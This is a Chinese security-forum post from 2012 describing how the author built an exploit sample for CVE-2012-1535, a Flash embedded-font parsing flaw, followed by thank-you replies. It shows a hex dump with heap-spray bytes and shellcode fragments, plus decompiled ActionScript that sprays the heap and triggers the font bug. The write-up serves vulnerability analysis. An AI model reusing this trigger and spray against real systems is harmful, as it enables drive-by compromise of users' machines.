[原创]CVE-2012-1535 Flash解析特殊格式字体漏洞样本构造分享-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]CVE-2012-1535 Flash解析特殊格式字体漏洞样本构造分享

发表于: 2012-10-27 23:56 7154

[原创]CVE-2012-1535 Flash解析特殊格式字体漏洞样本构造分享

仙果

2012-10-27 23:56

7154

题记：
很早就想写这么一篇分享，分享自己在构造CVE-2012-1535这一Flash 漏洞样本过程中所遇到的一些问题和总结的一些心得。
之前有古河和 Wingdbg 两位大牛两篇漏洞原理的分析文章，我这篇就不从漏洞原理上进行阐述分析，主要说的是自己在分析构造样本过程中的一些思路和方法，都是一些很简单粗浅的东西，大牛看到也莫怪，权当茶余饭后的资料。
古河：【原创】cve-2012-1535漏洞调试分析（附样本）：
http://bbs.pediy.com/showthread.php?t=154860
Wingdbg:【原创】CVE-2012-1535 Flash漏洞调试笔记
http://bbs.pediy.com/showthread.php?t=155101
看到了metazhou的一篇分析
【原创】Step by Step调试CVE-2012-0158 POC
http://bbs.pediy.com/showthread.php?t=152407
与他们的文章结合起来就可以走完漏洞分析的过程，对从事漏洞分析有一定的帮助。最后容我发句牢骚：真心喜欢现在所从事的工作，祈求生活不要给我那么大的压力。
貌似我每次废话都很多，现在开始正题：
分析环境：
Windows XP SP3 虚拟机
010editor
Windbg
硕思闪客精灵

一分析Flash Swf样本
当拿到一个文件格式方面的样本时，自己的习惯不是去双击打开它，而是使用010editor等十六进制编辑工具打开文件，查看文件中是否有对分析有所帮助的信息，或许能够发现一些漏洞的蛛丝马迹。这次就在十六进制中发现了一些很奇妙的东西：

00D0h: 61 73 68 3C 2F 64 63 3A 66 6F 72 6D 61 74 3E 3C  ash</dc:format>< 
00E0h: 64 63 3A 74 69 74 6C 65 3E 41 64 6F 62 65 20 46  dc:title>Adobe F 
00F0h: 6C 65 78 20 34 20 41 70 70 6C 69 63 61 74 69 6F  lex 4 Applicatio 
0100h: 6E 3C 2F 64 63 3A 74 69 74 6C 65 3E 3C 64 63 3A  n</dc:title><dc: 
0110h: 64 65 73 63 72 69 70 74 69 6F 6E 3E 68 74 74 70  description>http 
	…..
01B0h: 3C 64 63 3A 64 61 74 65 3E 41 75 67 20 31 30 2C  <dc:date>Aug 10, 
01C0h: 20 32 30 31 32 3C 2F 64 63 3A 64 61 74 65 3E 3C   2012</dc:date><

0380h: 00 56 00 00 00 61 00 00 00 7C 41 64 6F 62 65 49  .V...a...|AdobeI 
0390h: 64 65 6E 74 69 74 79 52 65 78 6C 69 61 46 72 65  dentityRexliaFre 
03A0h: 65 2D 52 65 67 75 6C 61 72 56 65 72 73 69 6F 6E  e-RegularVersion 
03B0h: 20 31 2E 30 30 30 52 65 78 6C 69 61 20 69 73 20   1.000Rexlia is  
03C0h: 61 20 74 72 61 64 65 6D 61 72 6B 20 6F 66 20 54  a trademark of T 
03D0h: 79 70 6F 64 65 72 6D 69 63 20 46 6F 6E 74 73 52  ypodermic FontsR 
03E0h: 65 78 6C 69 61 20 46 72 65 65 2F 4F 72 69 67 46  exlia Free/OrigF 
03F0h: 6F 6E 74 54 79 70 65 20 2F 54 72 75 65 54 79 70  ontType /TrueTyp 
0400h: 65 20 64 65 66 00 CC 02 00 01 00 50 00 9F 00 A2  e def.?...P.??

C370h: C0 00 00 00 03 00 01 04 09 00 00 01 80 00 C0 28  ?..........€.? 
C380h: 63 29 20 32 30 30 38 20 54 79 70 6F 64 65 72 6D  c) 2008 Typoderm 
C390h: 69 63 20 46 6F 6E 74 73 2E 20 54 68 69 73 20 66  ic Fonts. This f 
C3A0h: 6F 6E 74 20 69 73 20 66 72 65 65 77 61 72 65 2E  ont is freeware. 
C3B0h: 20 52 65 61 64 20 61 74 74 61 63 68 65 64 20 74   Read attached t 
C3C0h: 65 78 74 20 66 69 6C 65 20 66 6F 72 20 64 65 74  ext file for det 
C3D0h: 61 69 6C 73 2E 20 43 68 65 63 6B 20 6F 75 74 20  ails. Check out  
C3E0h: 74 68 65 20 72 65 73 74 20 6F 66 20 74 68 65 20  the rest of the  
C3F0h: 52 65 78 6C 69 61 20 66 61 6D 69 6C 79 20 61 6E  Rexlia family an 
C400h: 64 20 74 68 65 20 4F 70 65 6E 54 79 70 65 20 76  d the OpenType v 
C410h: 65 72 73 69 6F 6E 20 61 74 20 54 79 70 6F 64 65  ersion at Typode 
C420h: 72 6D 69 63 3A 20 68 74 74 70 3A 2F 2F 77 77 77  rmic: http://www 
C430h: 2E 74 79 70 6F 64 65 72 6D 69 63 2E 63 6F 6D 00  .typodermic.com.

C820h: 49 41 4E 06 65 6E 64 69 61 6E 22 30 63 30 63 30  IAN.endian"0c0c0 
C830h: 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30  c0c0c0c0c0c0c0c0 
C840h: 63 30 63 30 63 30 63 39 30 39 30 39 30 88 12 39  c0c0c0c909090?9 
C850h: 30 39 30 39 30 39 30 39 30 45 39 34 37 30 31 30  090909090E947010 
C860h: 30 30 30 43 32 38 46 33 36 44 38 41 30 44 46 31  000C28F36D8A0DF1 
C870h: 36 44 35 42 35 46 30 44 45 37 38 44 30 30 35 38  6D5B5F0DE78D0058

        public function Main() : void
        {
            this.FontClass = Main_FontClass;
            this.heapSpray();
            this.TextBlock_createTextLineExample();
            return;
        }// end function

        public function TextBlock_createTextLineExample() : void
        {
            var _loc_1:String = "Edit the world in hex.";
            var _loc_2:* = new FontDescription("PSpop");
            _loc_2.fontLookup = FontLookup.EMBEDDED_CFF;
            var _loc_3:* = new ElementFormat(_loc_2);
            _loc_3.fontSize = 16;
            var _loc_4:* = new TextElement(_loc_1, _loc_3);
            var _loc_5:* = new TextBlock();
            new TextBlock().content = _loc_4;
            this.createLines(_loc_5);
            return;
        }// end function

        private function createLines(param1:TextBlock) : void
        {
            var _loc_2:Number = 300;
            var _loc_3:Number = 15;
            var _loc_4:Number = 20;
            var _loc_5:* = param1.createTextLine(null, _loc_2);
            while (_loc_5)
            {
                
                _loc_5.x = _loc_3;
                _loc_5.y = _loc_4;
                _loc_4 = _loc_4 + (_loc_5.height + 2);
                addChild(_loc_5);
                _loc_5 = param1.createTextLine(_loc_5, _loc_2);
            }
            return;
        }// end function

[Embed(parameter1,parameter2,...)] 元数据

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

1.png （18.61kb，8次下载）
2.png （22.12kb，3次下载）
Flex4App.rar （50.15kb，97次下载）
CVE-2012-1535 Flash解析特殊格式字体漏洞样本构造分享.doc （103.50kb，129次下载）

收藏・19

免费・6

支持

最新回复 (16)
金罡雪币： 1489 活跃值： (1053) 能力值： ( LV8，RANK：130 ) 在线值：发帖 13 回帖 367 粉丝 108 关注私信	金罡 2 2 楼沙发坐下来慢慢看。 2012-10-28 00:15 0
小猪怕怕雪币： 160 活跃值： (26) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 44 粉丝 0 关注私信	小猪怕怕 3 楼好文慢慢看。 2012-10-28 01:03 0
MaYil 雪币： 7012 活跃值： (4222) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 259 粉丝 2 关注私信	MaYil 4 楼搬个凳子来学习 2012-10-28 12:16 0
hellok 雪币： 227 活跃值： (120) 能力值： ( LV10，RANK：160 ) 在线值：发帖 10 回帖 83 粉丝 4 关注私信	hellok 3 5 楼 LZ深夜发帖。辛苦辛苦思路赞。+1 2012-10-28 12:35 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 6 楼辛苦，学习~~ 2012-10-28 12:39 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 7 楼谢谢看雪大哥 2012-10-28 14:08 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 8 楼辛苦，学习~~ 2012-10-28 14:09 0
linhanshi 雪币： 97697 活跃值： (200829) 能力值： (RANK：10 ) 在线值：发帖 9249 回帖 27947 粉丝 453 关注私信	linhanshi 9 楼 Thanks for share. 上传的附件： cool.gif （0.75kb，3次下载） 2012-10-28 14:58 0
Fido 雪币： 107 活跃值： (404) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 10 楼辛苦，学习~~ 2012-10-28 15:01 0
Nerin 雪币： 293 活跃值： (40) 能力值： ( LV6，RANK：90 ) 在线值：发帖 3 回帖 31 粉丝 0 关注私信	Nerin 2 11 楼神牛出手了啊... 2012-10-28 15:12 0
张振江雪币： 122 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 226 粉丝 0 关注私信	张振江 12 楼好过程，仙果真勤奋啊，慢慢看，以后把打游戏的时间挪来学习 2012-10-28 16:12 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 13 楼如果FlashBuilder 不行的话，试下 Flash Develop 这个工具 2012-11-1 09:56 0
kindsjay 雪币： 310 活跃值： (159) 能力值： ( LV12，RANK：200 ) 在线值：发帖 21 回帖 118 粉丝 1 关注私信	kindsjay 4 14 楼给仙果支持下,下次多喝点 2012-11-2 11:49 0
chenwupedi 雪币： 20 活跃值： (38) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 32 粉丝 1 关注私信	chenwupedi 15 楼支持学习了 2015-10-27 14:22 0
linso 雪币： 349 活跃值： (125) 能力值： ( LV7，RANK：100 ) 在线值：发帖 9 回帖 84 粉丝 3 关注私信	linso 1 16 楼没看懂。。收藏了慢慢看 2015-11-12 14:15 0
Ox9A82 雪币： 799 活跃值： (457) 能力值： ( LV12，RANK：280 ) 在线值：发帖 18 回帖 116 粉丝 28 关注私信	Ox9A82 3 17 楼看来样本构造也有很多学问啊 2016-8-11 16:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

仙果

发帖

1507

回帖

860

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (16)
金罡雪币： 1489 活跃值： (1053) 能力值： ( LV8，RANK：130 ) 在线值：发帖 13 回帖 367 粉丝 108 关注私信	金罡 2 2 楼沙发坐下来慢慢看。 2012-10-28 00:15 0
小猪怕怕雪币： 160 活跃值： (26) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 44 粉丝 0 关注私信	小猪怕怕 3 楼好文慢慢看。 2012-10-28 01:03 0
MaYil 雪币： 7012 活跃值： (4222) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 259 粉丝 2 关注私信	MaYil 4 楼搬个凳子来学习 2012-10-28 12:16 0
hellok 雪币： 227 活跃值： (120) 能力值： ( LV10，RANK：160 ) 在线值：发帖 10 回帖 83 粉丝 4 关注私信	hellok 3 5 楼 LZ深夜发帖。辛苦辛苦思路赞。+1 2012-10-28 12:35 0
kanxue 雪币： 47147 活跃值： (20450) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 6 楼辛苦，学习~~ 2012-10-28 12:39 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 7 楼谢谢看雪大哥 2012-10-28 14:08 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 8 楼辛苦，学习~~ 2012-10-28 14:09 0
linhanshi 雪币： 97697 活跃值： (200829) 能力值： (RANK：10 ) 在线值：发帖 9249 回帖 27947 粉丝 453 关注私信	linhanshi 9 楼 Thanks for share. 上传的附件： cool.gif （0.75kb，3次下载） 2012-10-28 14:58 0
Fido 雪币： 107 活跃值： (404) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 1019 粉丝 1 关注私信	Fido 10 楼辛苦，学习~~ 2012-10-28 15:01 0
Nerin 雪币： 293 活跃值： (40) 能力值： ( LV6，RANK：90 ) 在线值：发帖 3 回帖 31 粉丝 0 关注私信	Nerin 2 11 楼神牛出手了啊... 2012-10-28 15:12 0
张振江雪币： 122 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 226 粉丝 0 关注私信	张振江 12 楼好过程，仙果真勤奋啊，慢慢看，以后把打游戏的时间挪来学习 2012-10-28 16:12 0
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 13 楼如果FlashBuilder 不行的话，试下 Flash Develop 这个工具 2012-11-1 09:56 0
kindsjay 雪币： 310 活跃值： (159) 能力值： ( LV12，RANK：200 ) 在线值：发帖 21 回帖 118 粉丝 1 关注私信	kindsjay 4 14 楼给仙果支持下,下次多喝点 2012-11-2 11:49 0
chenwupedi 雪币： 20 活跃值： (38) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 32 粉丝 1 关注私信	chenwupedi 15 楼支持学习了 2015-10-27 14:22 0
linso 雪币： 349 活跃值： (125) 能力值： ( LV7，RANK：100 ) 在线值：发帖 9 回帖 84 粉丝 3 关注私信	linso 1 16 楼没看懂。。收藏了慢慢看 2015-11-12 14:15 0
Ox9A82 雪币： 799 活跃值： (457) 能力值： ( LV12，RANK：280 ) 在线值：发帖 18 回帖 116 粉丝 28 关注私信	Ox9A82 3 17 楼看来样本构造也有很多学问啊 2016-8-11 16:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复